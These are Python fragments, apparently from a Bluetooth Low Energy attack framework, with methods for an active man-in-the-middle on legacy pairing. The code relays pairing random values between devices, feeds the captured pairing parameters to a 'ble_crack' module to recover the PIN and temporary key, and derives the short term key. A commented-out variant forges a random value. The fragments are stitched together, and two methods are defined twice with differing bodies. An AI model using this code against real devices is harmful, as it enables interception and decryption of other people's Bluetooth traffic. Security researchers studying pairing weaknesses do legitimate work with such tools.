def masterPairingRandom(self, packet):
if self.getStage() == BLEMitmStage.ACTIVE_MITM:
io.info("Pairing Random (from master) : random = " +
packet.random.hex())
io.info("Storing mRand : " + packet.random.hex())
self.mRand = packet.random[::-1]
m = utils.loadModule("ble_crack")
m["MASTER_RAND"] = self.mRand.hex()
m["PAIRING_REQUEST"] = self.pReq.hex()
m["PAIRING_RESPONSE"] = self.pRes.hex()
m["INITIATOR_ADDRESS_TYPE"] = "public" if self.initiatorAddressType == b"\x00" else "random"
m["INITIATOR_ADDRESS"] = self.initiatorAddress
m["RESPONDER_ADDRESS_TYPE"] = "public" if self.responderAddressType == b"\x00" else "random"
m["RESPONDER_ADDRESS"] = self.responderAddress
m["MASTER_CONFIRM"] = self.mConfirm.hex()
output = m.run()
if output["success"]:
self.pin = int(output["output"]["PIN"])
self.temporaryKey = bytes.fromhex(
output["output"]["TEMPORARY_KEY"])
else:
self.pin = 0
self.temporaryKey = b"\x00" * 16
io.info("Redirecting to slave ...")
self.a2sEmitter.sendp(ble.BLEPairingRandom(random=packet.random))
def slavePairingRandom(self,packet):
if self.getStage() == BLEMitmStage.ACTIVE_MITM:
io.info("Pairing Random (from slave) : random = "+packet.random.hex())
io.info("Storing sRand : "+packet.random.hex())
self.sRand = packet.random[::-1]
io.info("Redirecting to master ...")
self.a2mEmitter.sendp(ble.BLEPairingRandom(random=packet.random))
def slavePairingRandom(self, packet):
if self.getStage() == BLEMitmStage.ACTIVE_MITM:
io.info("Pairing Random (from slave) : random = " +
packet.random.hex())
io.info("Storing sRand : " + packet.random.hex())
self.sRand = packet.random[::-1]
io.info("Redirecting to master ...")
#newRandom = ble.BLECrypto.c1m1(self.temporaryKey,self.sConfirm,self.pReq,self.pRes,self.initiatorAddressType,self.initiatorAddress,self.responderAddressType,self.responderAddress)
#self.forgedsRand = newRandom
#io.info("Using fake random : "+newRandom.hex())
self.a2mEmitter.sendp(ble.BLEPairingRandom(random=packet.random))
def masterPairingRandom(self, pkt):
pkt.show()
self.mRand = pkt.random
response = ble.BLEPairingRandom(random=self.sRand)
self.emitter.sendp(response)
mConfirm = ble.BLECrypto.c1(self.tk, self.mRand[::-1], self.pReq,
self.pRes, self.initiatorAddressType,
self.initiatorAddress,
self.responderAddressType,
self.responderAddress)
if self.mConfirm == mConfirm:
io.success("Confirm Value correct !")
self.stk = ble.BLECrypto.s1(self.tk, self.mRand[::-1],
self.sRand[::-1])
io.success("Generating Short Term Key (STK): " + self.stk.hex())
else:
io.fail("Confirm value failed ! Terminating ...")
self.failure = True
def slavePairingConfirm(self, pkt):
pkt.show()
self.sConfirm = pkt.confirm[::-1]
response = ble.BLEPairingRandom(random=self.mRand)
response.show()
self.emitter.sendp(response)